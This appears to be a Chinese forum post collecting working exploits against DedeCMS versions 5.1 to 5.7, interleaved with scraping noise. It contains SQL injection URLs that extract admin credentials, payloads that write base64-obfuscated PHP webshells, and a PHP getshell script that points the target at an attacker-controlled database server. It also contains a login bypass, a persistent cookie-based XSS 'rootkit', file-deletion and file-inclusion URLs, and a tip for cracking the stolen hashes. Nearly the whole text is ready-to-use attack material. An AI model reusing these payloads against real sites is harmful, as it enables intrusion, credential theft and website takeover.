|
|
3 f: G4 \& _8 B. B* y
Dedecms 5.6 rss注入漏洞
$ P9 }+ Z+ N! `5 {http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=12 f* V% Y) Y5 _# c& n) L
/ e( |: J; J @6 S' C
# t% ~, X, B# W I0 m
) m2 Q1 B7 \' a8 R: K1 {* V& T0 g A& m
3 Q$ L N4 R0 i) \) h- |! Z1 ]( N
* @7 f9 ]% J! a# S" m c6 l
, `* _+ H, c% Q E! S- Z2 t8 `/ c. S: m$ f0 R
DedeCms v5.6 嵌入恶意代码执行漏洞
1 |5 Y8 m5 v0 Q# [5 O9 u注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
9 y3 }! f! M7 [8 R( C) @发表后查看或修改即可执行
& H/ Q6 s3 O2 S$ [/ r0 ca{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 R N" P% ?# _# ]
生成x.php 密码xiao,直接生成一句话。( b8 F. Q9 H& c: d4 [. L
6 y- ?% o5 x3 W+ _7 O" i& s6 g- @( `7 f6 V6 Y7 P6 f+ @( \0 f/ g, u
" W: M8 C/ @' `# ], I* C
. {: G1 v+ w5 m4 I1 S8 }
+ v" M! q* U4 v! M% Z8 Z
2 J( @2 d9 e/ r+ A+ [3 \6 t1 u( B* q5 S7 w
( g! r N5 \& K
Dede 5.6 GBK SQL注入漏洞
( T$ z# | W2 Mhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';& j9 B ]! O+ r; f3 r0 `# f0 D- t
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
7 n$ ^/ i/ U* y0 q4 O; whttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
1 P5 i( q8 M$ c+ A4 {1 a* h+ }3 H* J* b! L# d
- f2 y5 l" ]- z; X3 V5 o
6 Z+ Z" H) D: q' t! }
" a; N- D, U9 h' J
: C) Q7 H4 ?0 T. C1 [# x$ Q% g' b& U- X( M+ Q4 l1 k
_0 {2 g& ?9 q6 X: y0 z/ y
/ z4 F0 e# [* T. I+ b
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' K% Q# a6 h7 U m! D# \) s! ?http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 n# F0 N& u7 Q7 I
3 p; ^0 }% q1 c, c3 R8 U, l: V* y r* Q) k3 @* {
: e# b. z' i( K( c( Y4 X; e( P% a3 F
3 {5 Y1 {% ?$ C# M
) A' B+ [9 w( f7 k2 lDEDECMS 全版本 gotopage变量XSS漏洞% f1 l# H2 n; s! b9 J# D
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 3 ?1 r) b5 ^3 a i
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
/ ~( a; G+ u) r8 N& [$ ^: M. j, Z0 k, }) p" w: v! q
* j+ Z( e! j: g: Z) _: y2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ) z" v7 d1 o5 U1 d
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
4 ?3 `( H5 m- _- W3 L/ Z( w
3 K1 i0 H! [7 S7 ~3 f5 y# P, H9 y' }. j( R$ i0 R1 I9 p4 W
http://v57.demo.dedecms.com/dede/login.php3 U5 o/ b. j5 `* r$ N! E
. ]0 M0 z$ N9 g1 f: Y/ T
9 b( k0 }- N( F" K$ f" U& T, X1 C% g
color=Red]DeDeCMS(织梦)变量覆盖getshell) C# P9 L6 {& d4 N
#!usr/bin/php -w
5 G! @, u/ i0 k<?php
6 T) k8 N8 D4 G- \error_reporting(E_ERROR);0 u4 ^8 K7 Y3 |4 y/ @) P1 ` r
set_time_limit(0);6 q' {8 R; l. z- Z/ h
print_r('
2 B. C( t% t% q' i+ XDEDEcms Variable Coverage
; k8 i) t. ^6 n; }5 @/ nExploit Author: www.heixiaozi.comwww.webvul.com
3 S% u/ x, X% b/ d);' m( h; ~/ O; d2 |/ r
echo "\r\n";
2 b) l) b# F7 Kif($argv[2]==null){
3 J+ h1 h0 i- {! Wprint_r('
7 e3 a. i8 D5 D# ]: d8 Q+---------------------------------------------------------------------------+/ D- {2 |( y* U/ R
Usage: php '.$argv[0].' url aid path) J' k& C; _ b T
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
& m5 o( M. [; {) Q9 S: l. ZExample:1 \, ?7 C1 [. s' @, r! }
php '.$argv[0].' www.site.com 1 old; ?2 K4 e6 q4 r/ e
+---------------------------------------------------------------------------+6 L7 ]* Y# ^8 z/ L+ j$ `3 B
');
* ^* M, C2 F8 P. |7 P- H% Uexit;' J( h# m& `# o! w8 N
}1 v, y9 |7 [& T/ n2 K/ {0 I, h
$url=$argv[1];
$ A- Y7 R/ S) W1 F7 ~$aid=$argv[2];( @0 u& C8 S, y* f
$path=$argv[3];2 C' B* W4 R. }7 c7 K9 F" @$ d$ p
$exp=Getshell($url,$aid,$path);
( |8 C" K& \/ p( R Z* jif (strpos($exp,"OK")>12){
. L5 b: F7 L5 c) secho "
- n7 r5 E+ h; ^' K* g4 J$ K6 IExploit Success \n";
; o# s t5 T4 R, T! W! yif($aid==1)echo "
& j$ i7 X X& z& E" J) `4 ]Shell:".$url."/$path/data/cache/fuck.php\n" ;9 m% h" S* e/ e4 v$ E ^$ J6 Y: M$ U
& E4 t ]# v% o# H: J2 _
! O1 |7 A9 }% y8 N, C$ H, e( rif($aid==2)echo "
) |' F/ A- m; m& ^Shell:".$url."/$path/fuck.php\n" ;& p( ]' G4 j, h7 Z0 Z& R
7 g p" P2 l w$ q1 X# ^6 W3 E+ o% u# A8 x: b7 f2 |* B
if($aid==3)echo "
2 U7 f+ K8 C: N% ]Shell:".$url."/$path/plus/fuck.php\n";
: N4 r% _; g6 E% `: i# {; ?
) s; H' S9 ~! G/ z0 }* J
7 d5 R( o, X. J# O; {2 H4 `}else{
& E# U: m5 z: l% a) o1 techo "
, O, C0 `- E' @% h+ v# uExploit Failed \n";) _+ h% S3 f- p9 D4 R0 H
}
$ P0 y$ [- \& J- D( r- Wfunction Getshell($url,$aid,$path){
; [# [- P1 F" h# }4 u8 F1 K2 R$id=$aid;
- N7 D( W8 B- O) n$host=$url;
% d% B; e) `3 r& ~' |$ i/ U( `7 b9 r G! J$port="80";
0 o) W6 g- p" K( _' [6 R$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";& C& M8 }7 F0 w) Q
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";* \4 n& z4 q; D; K6 T. N3 s4 x
$data .= "Host: ".$host."\r\n";) \$ ~4 O! L; _" J( Z
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
' D- w0 S( l3 F; O! Q$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$ l+ U: K0 m, h8 _
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";% b D2 O4 [$ y7 V
//$data .= "Accept-Encoding: gzip,deflate\r\n";
% f# R9 t5 u$ O' S8 c% \$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";8 ~" v% W9 u! _. Q7 V' q6 |
$data .= "Connection: keep-alive\r\n";
0 w4 j# ^2 w9 }6 e/ C. S3 \$data .= "Content-Type: application/x-www-form-urlencoded\r\n";1 a8 w! M6 L8 v) C6 n0 Q. k
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";: m$ |/ W" o* Y4 n, W1 E
$data .= $content."\r\n";6 A1 d4 z2 z" X3 V
$ock=fsockopen($host,$port);9 c: ^: w2 `: [' U' o3 ~" E9 Q' e
if (!$ock) {0 a# n" l' v* d; o4 N2 \
echo "
* J2 ]4 u# a7 ONo response from ".$host."\n";
8 J/ z g5 }' x1 u) q}
$ w3 J' a! v6 W3 N& f% h& Z7 afwrite($ock,$data);
+ ]. x! w5 W4 L, Y9 J- v9 ]while (!feof($ock)) {% L4 ]! y8 [2 N7 n0 G3 y5 a
$exp=fgets($ock, 1024);
9 F) M1 `8 ?/ x5 \8 {% nreturn $exp;
; ?' `" g) o6 ]7 w} Q% l( p# D: Y' z4 b+ h; s
}0 ?2 f, ~ i& L d4 ^
# M z0 b0 M, m. t' a# D7 a
, [8 m: s2 c2 {. k/ T7 I7 P. J& }?>
- s, w3 q% ^3 _* v, R! X) b' D
) d' h& t& U7 R9 D1 R* @, I( H* v P5 l" ]8 v) v/ w
0 b! {. r0 T. J8 C
8 c: M# X+ G- i. h$ p q- O
- w+ b# [, k8 @
! K0 b" z9 C: @) c
& X* C* `% i, s0 E8 D& I* C7 ~( c9 _# A$ D
" t Y% K4 M9 r8 g8 x
/ _8 {4 t3 q$ Q1 r0 w2 EDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: Z" I2 G1 Z$ N& `http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
$ e, C8 t; k" K S6 }2 b% \& b6 G+ u: R* Z
+ q8 {4 S6 {0 ^% ]5 @
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
6 f* v9 y( j- v5 U$ n& `3 z, A/ d3 _
1 O0 [3 g2 j, c3 B6 s# B7 \+ [
此漏洞的前提是必须得到后台路径才能实现# }2 o" [6 x- i) A1 }( }( z Z
1 p1 B( |7 B; `/ v
" m3 \% L, w2 L# G2 k3 o8 w' E5 A
' p4 D* { ? q. B
( h" L& t5 Z- Z2 G. {* x4 G$ @9 G! w! t0 `" i, ^
U$ U0 N# M; o0 R: @6 e+ i
8 U e* w+ @1 n" Z0 K7 N
0 S7 ?0 a4 c0 x2 L4 o# u7 ^: k% g8 K& }# V2 l
! b" ^& y1 b7 v# i, x! @/ a, xDedecms织梦 标签远程文件写入漏洞8 d- e* H& x& W- }- Z
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
0 n) j e2 W7 p! q- r- ?
$ l( W; G B/ }& {& q
% \( K1 S: t" Z' X6 @3 L再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
0 y' @5 O' ?" S: s- n2 m+ E<form action="" method="post" name="QuickSearch" id="QuickSearch">
$ \2 v- g5 ^/ _1 t9 Q<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />* P6 z. N" o+ A: o o) `; u8 @& D
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
$ x7 I- h& J/ ~6 {6 {+ c) @( ^9 J<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />9 h$ {: C- _/ L; W
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />7 h Z" w9 D* o+ F9 D# B
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
8 m5 q, @# F" ]8 g: l<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 F% k& n) B* a! V<input type="text" value="true" name="nocache" style="width:400">; q4 L/ c N1 l
<input type="submit" value="提交" name="QuickSearchBtn"><br />. B5 _9 t6 ], {4 }( Q' F
</form>
! v! e. K/ b# p. a9 T<script>: j6 ~1 n) _2 r! I4 p0 J
function addaction()
8 J {3 ?2 x$ j7 M- ^; R) ~{
* r/ l6 Y/ A8 b" ]& I2 c5 `0 O: Tdocument.QuickSearch.action=document.QuickSearch.doaction.value;
$ T1 @' w/ R5 p: q1 X; ?}8 _4 Z1 t6 S$ i( F2 v
</script>
" e; ~# j- b; H2 L4 F2 i$ n; O6 c. O) v& M
" W& x: f* `7 f. {
" S) M5 j0 Z6 j- S
' B/ H5 `, }, H5 k
+ \# q) H4 g5 B. p% [# f5 _2 m7 X5 D t' g
' a3 O: i. i6 {( k. L: q$ w
: }$ A9 f5 |. w$ A" I* \: [8 \2 r$ h) O/ d* k
+ }- ?, w( @- \/ q: b
DedeCms v5.6 嵌入恶意代码执行漏洞
, ?! D) B& i9 ?4 {注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
! j' e5 J+ e* }8 M" `4 H3 Ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}' o+ W; b( X+ C, u7 l: p; r
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得' V6 \/ u" K6 t L7 P1 ]
Dedecms <= V5.6 Final模板执行漏洞
! w5 { T* [: V* W6 h注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:# [& D# F* U/ \7 U }3 ^. i- `
uploads/userup/2/12OMX04-15A.jpg8 c/ V4 ?( Z" V. V& E7 q
, ~& x1 p/ I3 r) |, `/ D* B8 e9 ~, \: t
模板内容是(如果限制图片格式,加gif89a):
; Y& J8 t: E+ U" z* f6 u/ k* h{dede:name runphp='yes'}
2 K! Z3 m7 A/ a$fp = @fopen("1.php", 'a');1 I" \* `" G4 m5 b0 Z, o" n/ s
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");0 Y$ K8 N( i( c7 P0 `5 M7 \8 o6 J$ l, T
@fclose($fp);
[) m; f5 ~/ K# S{/dede:name}
- a: U" r" q' d2 f: n2 修改刚刚发表的文章,查看源文件,构造一个表单:, `$ ]% u# R( ]) C5 M
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">" V& x. d8 z U; Q
<input type="hidden" name="dopost" value="save" />& c" v Y, ?1 T: C8 m2 w
<input type="hidden" name="aid" value="2" />
' i. c; x' x. e k0 d2 G4 f7 V<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />8 K- ^% z/ J: u _5 H2 A8 ~
<input type="hidden" name="channelid" value="1" />
' `% w3 q. ^$ b+ b6 s<input type="hidden" name="oldlitpic" value="" />
. _: z' V- u* a+ W$ ?6 M! ]! y2 o<input type="hidden" name="sortrank" value="1275972263" />
/ R( d; ]3 R) ? D; @1 ~! f s
% U# c5 G2 F3 Z0 L/ |' _+ H6 ^% ^- C7 D) B6 `1 T
<div id="mainCp">! B; d! J r* i+ M5 U& c d: V
<h3 class="meTitle"><strong>修改文章</strong></h3>6 m/ T: A+ h& Y
$ W! d. L+ }. o9 q' s
1 y* \1 h( ?* i1 i
<div class="postForm">8 h" U( B2 |& Q
<label>标题:</label>
- f+ M, L- x1 P0 X& G% U B$ v! }<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" o# M) v$ ]$ l, u1 G+ S
& l2 y [. b( J5 ~5 j/ l. z. A: n4 I3 N! Q; D. j# P
<label>标签TAG:</label>1 V. B# o" K' {4 L7 v* B3 L8 m
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)8 b2 z8 ^, |5 z+ q: Z9 d
: _% p& O& y4 }7 z% D" a
3 [0 ~' G0 q- L0 N' H9 g0 h" N<label>作者:</label>
/ e. A$ [( r' c! T<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
! G. s' O1 V0 S- ^3 h+ i; j
( e4 |5 E( E: V2 H
! s6 \ L8 h* ^! K& e: d<label>隶属栏目:</label>
1 C0 T( B9 ?+ \2 ~2 |<select name='typeid' size='1'>2 A' Z/ q! t" _5 C* y0 t! @& q) P" t
<option value='1' class='option3' selected=''>测试栏目</option>: Q: T6 h' S9 U( v0 @
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)0 S7 A2 b. F) s5 \! w. Q* r
" W: N( Y) Y# S% ^& J- a) U
2 i9 \+ m1 d; i# r8 I
<label>我的分类:</label>
9 W, V+ a/ _1 U" B% J$ @7 r( m<select name='mtypesid' size='1'>. N% f E4 y, z6 [ {0 `( T5 G
<option value='0' selected>请选择分类...</option>
( |# B6 r, V( V! M0 Y7 V<option value='1' class='option3' selected>hahahha</option>8 V6 M0 j" T. \7 l" {/ l2 P" L) `
</select>4 M, H, S2 A5 ?) n, d0 Y. ~; T, p1 J
& T, k0 q! V: l; n
- \) p! G7 M5 L5 t5 E; @: Y, u<label>信息摘要:</label>& c, p$ P0 N! N8 } {
<textarea name="description" id="description">1111111</textarea>
: E3 h. K: ^+ t1 b8 m( I# j(内容的简要说明)' \: K! R3 M: M- W0 [
! `% A1 l! f$ q* ?5 L% ^
4 a, a6 h* q9 w! S8 p
<label>缩略图:</label>' d i4 _0 r7 {
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>- X+ e D+ N- L
; w! V+ x. S q5 _+ f- t8 X; }5 g
<input type='text' name='templet'
1 a/ V/ ~$ T% |% svalue="../ uploads/userup/2/12OMX04-15A.jpg">/ K$ c- ?" ^- K' d% c5 l' w
<input type='text' name='dede_addonfields'
8 Z" b g0 B3 E: F( H; zvalue="templet,htmltext;">(这里构造)% {+ H& _) C5 N# p, a
</div>
, Q5 p4 E$ Y% y! F M4 M; ^' ^: m" _0 d- X4 i1 a& X3 n+ R
# R* W% |' I, Z0 y, s4 j" ?% I5 @<!-- 表单操作区域 -->% \1 p2 D& O9 e6 s8 R6 G
<h3 class="meTitle">详细内容</h3>( P% Q' P" v+ W0 x. o; H3 B
' i0 E( z# t- ~0 O: i% l7 o8 _
& T- s( f/ `9 q0 `9 X4 {<div class="contentShow postForm">
5 P, v |/ z/ d1 j<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
8 s" t3 o8 c! g4 g; {
3 @, n$ {# _, F% M, }) c' P: b% x9 q' S$ Q( a" I. v+ v$ p' |
<label>验证码:</label>
/ o5 ^; I8 J! p, k- q% [$ x* [9 T4 ^/ t<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
4 X/ e% m( s. D Z: z, j<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& A* k1 ?4 q9 f* w( Q. D( t7 I" _3 y
7 e. O* W; K" O9 k- G: | d
<button class="button2" type="submit">提交</button>* P1 _7 A: a3 V U2 k
<button class="button2 ml10" type="reset">重置</button>6 C+ t: z) g/ r5 @
</div>, f# j- [4 r. S6 |! K5 t
9 \' t7 i1 t- c. R3 E/ f& \( m7 ?9 V6 a3 H( ] {
</div>$ c3 ?1 X2 t/ w( C3 d" H
0 y8 a. {6 u+ O
' K& R& ?8 J% ~1 w! s4 ^' ~</form>
% S) l2 D5 L" u6 l2 e0 V, A- n# a# A2 a7 h& a
/ N s8 r1 A+ y9 }1 N) ^/ U提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
0 h) H% }* p) ^3 n假设刚刚修改的文章的aid为2,则我们只需要访问:/ Q4 Y* d/ o I$ b/ L
http://127.0.0.1/dede/plus/view.php?aid=22 ~$ I |: P& z m: g! J& r
即可以在plus目录下生成webshell:1.php
$ O9 x+ ]; L! i/ K! ?
0 C( T: V4 K9 S4 ]% V1 T3 w# P" Y. A* z% L( f; m5 Q8 l
- E2 m" M0 k; i6 t0 m$ Y) u& C5 @8 k* t' P
; M3 D4 O# }; K) n# ?
. X$ V$ M9 I- g+ E; ~! `
# |$ E# }+ y) a2 s, B# p/ M& w# I* [% ~ g' J/ p1 d# Z
! c2 a! A& _4 W% I( {3 G+ X
7 ~# j% q0 q2 F5 B9 u3 ?# E( e$ u+ P* i
z% `3 A6 r4 B& ?- d( J0 @
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ y+ C: J, d- x9 w2 z9 c$ `Gif89a{dede:field name='toby57' runphp='yes'}
S6 P* Y; z7 k) I* Jphpinfo();
8 m% [6 y7 k' E% {{/dede:field}( a" [* L |" R7 f% P
保存为1.gif
6 E. }0 u" H/ \, A<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 1 n- u/ C; @0 z% _2 r) T2 [
<input type="hidden" name="aid" value="7" /> 2 j/ U6 S& W2 l, d
<input type="hidden" name="mediatype" value="1" />
& P) ~; @0 n! p( R8 k( x3 f<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ' {- x9 N: m$ O, y! R5 E, V
<input type="hidden" name="dopost" value="save" />
a# f9 K9 _3 Z0 q- o( S( G<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> & g! M) _2 |* y/ b/ P: a! F6 w
<input name="addonfile" type="file" id="addonfile"/> " p/ E, o' X" p5 K8 N
<button class="button2" type="submit" >更改</button> / N0 w9 {8 }- R6 u' \) m' C
</form>
. f4 S8 O, y: i) T& h+ Y# b3 B/ `9 K; a, r: \7 T/ k
. F( i8 l% V+ {1 h构造如上表单,上传后图片保存为/uploads/userup/3/1.gif4 J, _: E/ c1 J5 x2 t& S; j
发表文章,然后构造修改表单如下:
0 D/ B* ^0 M) \7 v# l+ R! y2 _3 Y. i) K; k( _4 S
! I$ r% {, F q) q$ `2 O6 S
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
2 Y" F6 A4 m: Y: s' W<input type="hidden" name="dopost" value="save" />
' t0 M9 H* \2 S+ e4 c( D<input type="hidden" name="aid" value="2" />
% b9 c/ T8 L$ _5 x' B' ]$ b<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ; e$ B# j$ b& A& s' g4 ~
<input type="hidden" name="channelid" value="1" />
W. o8 c0 A6 w; l" H$ U<input type="hidden" name="oldlitpic" value="" />
/ f* ], K" t. ?1 n4 C/ l<input type="hidden" name="sortrank" value="1282049150" />
B l r3 p# x4 [<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 9 f% s$ y" ?* e: Y3 L; t
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
$ Z+ L" K6 w1 d! u<select name='typeid' size='1'> 0 P- j4 d1 g2 o0 ^$ U, d+ C
<option value='1' class='option3' selected=''>Test</option> # q$ Q+ k# \0 N5 L1 t9 z
<select name='mtypesid' size='1'>
- y/ _1 R9 r1 o7 b2 K7 a# R<option value='0' selected>请选择分类...</option>
7 [, n+ J* S( h/ o( k" d1 h% m<option value='1' class='option3' selected>aa</option></select> + _; L p7 h' g6 {
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
% z8 _& D8 m; T6 L4 d" R* G( h/ ^<input type='hidden' name='dede_addonfields' value="templet"> ( B2 K+ P+ i( L5 l
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
* d! D: u5 y0 {% Y! o& m<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> . Q( c! [. u2 y- u* o1 L/ @& X% @
<button class="button2" type="submit">提交</button>
. N1 S& J: i4 z" P7 z. [+ O</form>
0 O3 k2 _- _2 I9 C/ F* \
; h' |$ _$ |4 `2 N2 o O$ w$ {% ^( Q) B3 @. u/ c
Q& r8 Q+ B4 Y4 V& S
0 j. S# `6 ^( X$ [5 R" O: m
: Q9 z& g$ Z r3 w
, C" f( A/ X- t: q. _. m! V
; {# F2 j6 l* m) o, J6 v; J$ k( I! b/ E* J! _3 }( J' _' b
N7 K- T2 j C2 g/ y2 _
+ F. _# c$ r9 u2 U* [
0 Y* J9 P9 L) c( ]1 [+ f& [9 m$ n/ i* S l8 A
织梦(Dedecms)V5.6 远程文件删除漏洞$ V3 _7 E$ G o: C4 H
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif0 e E8 ~2 G/ X f( Z* i; z3 t8 S/ T
3 p! G ^1 I% V$ F& e g; x
! k5 R) E `8 O+ R J J
$ ^6 N* O0 d% i& N' o6 I( }( V( @8 Q; \+ z L. b7 Y3 G* i
2 Q" K8 ~) ^) P$ [/ R7 Y
5 o$ Z( p: E# u6 t& b8 r5 G8 V! s+ K$ P' ]& g. I' \6 V
5 P/ I6 z5 ^+ j* X! v0 C5 Q
) g1 O* e) u2 }3 T7 f0 W. A
+ a* H% ~; x. B# M0 i8 k. H4 W
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
4 X. m, v2 W2 r5 n9 F9 U3 R- _, shttp://www.test.com/plus/carbuya ... urn&code=../../
8 c! y$ f3 ~- l: i. j, l8 }2 M, E9 u
2 z7 V. x7 I3 {9 E- ^
+ B5 H9 E: [0 D, D3 ?/ v; L8 R5 r0 x% y. v
1 n; ^2 U2 B6 p+ U6 l. r' d+ t! M
7 }: F0 ]+ H0 W6 ?( {/ |, c! w/ |# |9 e% ^4 g9 {
6 I, ? ~5 [ y3 r, [
2 F/ [* T8 L2 ^. E; \; v3 \, L& D# ~9 _
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! v6 l {: T/ Qplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ a H0 @( V$ P3 s% J# _9 I+ f% v密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
8 T+ a) X& B9 Y0 J4 Z7 _3 _, n$ A7 R, l8 c+ }( p9 i
0 M/ ?/ G2 O! v$ d: ~* R3 d
# P( _5 Z3 n9 O5 T5 m& o* ]% S9 l y; N+ |: p3 `
; v' H) p+ M* a# L3 [5 D4 k0 g" f1 M$ M. ^% U/ m7 S
7 I+ y6 a" a- Y3 i( _
4 W1 `! G% H1 V* _8 A7 A( W6 z/ }% @
- w; V9 c+ B: d7 \4 |7 s
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
! M: o$ ]6 s4 hhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='5 f# P# g* P: d, j/ D: ^
( z/ r _ g: t4 I3 l. W' J. {
5 {% n0 I0 c0 f) T7 G
5 ] D4 D" z4 w% z* k# S" t. _& I- U0 e
9 p: U0 |) X% R2 v- _ k
( C: L0 C3 P! }0 D2 h$ P& N+ C( J% ?! Y. z' H2 e+ p
0 n! O9 ?: H9 Q) x5 B8 [' {
